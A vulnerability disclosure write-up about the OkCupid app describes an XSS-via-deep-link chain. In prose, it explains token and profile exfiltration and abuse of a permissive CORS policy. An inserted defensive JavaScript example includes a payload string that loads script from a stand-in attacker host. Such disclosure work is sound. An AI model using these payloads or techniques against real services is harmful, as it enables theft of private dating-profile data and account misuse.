
Sensitive Data Exposure & Performing Actions on Behalf of the Victim


At this point, we are able to launch the OkCupid mobile application with a deep link that carries malicious JavaScript code in the section parameter. The following screenshot shows the final XSS payload, which loads jQuery and then loads further JavaScript code from the attacker's server (the upper part is the XSS payload, the lower part is the same payload URL-encoded):

The following screenshot shows an HTTP GET request containing the final XSS payload in the section parameter:

The server reflects the payload sent in the section parameter, and the injected JavaScript code is executed in the context of the application's WebView.
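The reflection described above, as an added example that is not code from the original write-up or from OkCupid: a server-side template that concatenates the URL-decoded section parameter into HTML (the vulnerable form), beside the same template with contextual output encoding and a Content-Security-Policy that refuses script from foreign origins. The template, the parameter name "section", and the attacker host name are stand-ins; the write-up does not show the real endpoint.

```javascript
// Added example, not OkCupid's code. Shows why a reflected deep-link
// parameter becomes XSS in a WebView, and the encoding plus CSP that stop it.

// Entity-encode a value for the HTML text context.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the URL-decoded `section` value is concatenated straight into
// the HTML body, so a <script> tag carried in the deep link runs inside the
// WebView with the application's cookies and API access.
function renderVulnerable(query) {
  const section = new URLSearchParams(query).get('section') || '';
  return `<html><body><h1>${section}</h1></body></html>`;
}

// Hardened: same template, but the value is encoded for the HTML text
// context, and the response carries a CSP that forbids inline script and
// script loaded from any origin other than the page's own.
function renderHardened(query) {
  const section = new URLSearchParams(query).get('section') || '';
  return {
    headers: {
      'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    },
    body: `<html><body><h1>${htmlEncode(section)}</h1></body></html>`,
  };
}

// Minimal check for reflected script: does a live <script> tag survive in
// the rendered HTML?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed payload in the shape described above: it loads a script from
// the attacker's server (placeholder host) instead of carrying the
// exfiltration code inline.
const PAYLOAD = '<script src="https://attacker.example/x.js"></script>';
// The deep link's query string, with the payload URL-encoded as in the
// screenshot.
const QUERY = 'section=' + encodeURIComponent(PAYLOAD);

// Returns both renderings so the difference can be inspected side by side.
function demo() {
  return {
    vulnerable: renderVulnerable(QUERY),
    hardened: renderHardened(QUERY).body,
  };
}
```

Encoding alone is enough for the text context used here; the CSP is the second layer, because a payload that is rendered into an attribute or a script block would need a different encoder, and `script-src 'self'` blocks the externally hosted exfiltration script even if one such mistake slips through.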

As mentioned above, the final XSS payload loads a script file from the attacker's server. The loaded JavaScript code is used for exfiltration and contains three functions:

  1. steal_token – Steals the user's authentication token, oauthAccessToken, as well as the user's id, userid. Sensitive personal information (PII), such as the email address, is exfiltrated as well.
  2. steal_data – Steals the user's profile and private information, preferences, user characteristics (e.g. answers filled in during registration), and more.
  3. send_data_to_attacker – Sends the data collected by functions 1 and 2 to the attacker's server.

steal_token function:

The function makes an API call to the server. The user's cookies are sent with the request because the XSS payload executes in the context of the application's WebView.

The server responds with a large JSON document that contains the user's id and the authentication token:

steal_data function:

The function makes an HTTP request to the API endpoint.

Using the information exfiltrated by the steal_token function, the request is sent with the authentication token and the user's id.

The server responds with information about the victim's profile, including email, sexual orientation, height, family status, etc.

send_data_to_attacker function:

The function makes a POST request to the attacker's server containing all the information retrieved by the previous functions (steal_token and steal_data).

The following screenshot shows an HTTP POST request sent to the attacker's server. The request body contains all of the victim's sensitive information:

Performing actions on behalf of the victim is also possible, because the victim's authentication token and user id have been exfiltrated. This information is used by the malicious JavaScript code in the same way as in the steal_data function.

An attacker can perform actions such as sending messages and changing profile data using the information exfiltrated by the steal_token function:

  1. The authentication token, oauthAccessToken, is used in the Authorization header (as the bearer value).
  2. The user id, userId, is added where the API requires it.

Note: An attacker cannot perform a full account takeover, since the session cookies are protected with the HttpOnly flag and cannot be read by the injected script. The bearer token returned by the API is readable, however, so the attacker keeps API-level access to the account with the token rather than with the session.


Web Platform Vulnerabilities: Misconfigured Cross-Origin Resource Sharing Policy Leads to Sensitive Information Exposure

During the research, we found that the CORS policy of the API server api.okcupid.com is not configured properly: any origin can send requests to the server and read its responses. The following request was sent to the API server from an origin we control:

The server does not properly validate the origin and responds with the requested data. Moreover, the server response contains an Access-Control-Allow-Origin header together with Access-Control-Allow-Credentials: true, which is exactly the combination that lets a browser expose a cookie-authenticated response to the requesting page:

From this point on, we knew we could send requests to the API server from our own domain without being blocked by the CORS policy.

Once a victim who is authenticated to OkCupid browses to the attacker's web application, an HTTP GET request carrying the victim's cookies is sent to the API server's bootstrap endpoint. The server's response is a large JSON document containing the victim's authentication token and the victim's user_id.

The bootstrap API endpoint also pointed us to more useful data: sensitive API endpoints on the API server:

The following screenshot shows exfiltration of sensitive PII from the /profile/ API endpoint, using the victim's user_id and access_token:

The following screenshot shows exfiltration of the victim's messages from the /1/messages/ API endpoint, using the victim's user_id and access_token:


The world of online-dating apps has developed rapidly over the years and has matured to where it is today with the shift to a digital world, especially in the past six months, since the outbreak of the Coronavirus around the globe. "New normal" habits such as "social distancing" have forced the dating world to rely entirely on digital tools.

The research presented here shows the risks associated with one of the longest-established and most popular apps in its sector. The need for privacy and data security becomes far more critical when so much private and intimate information is stored, handled and analysed within one application. The app and platform were built to bring people together, but of course wherever people go, criminals will follow, looking for easy pickings.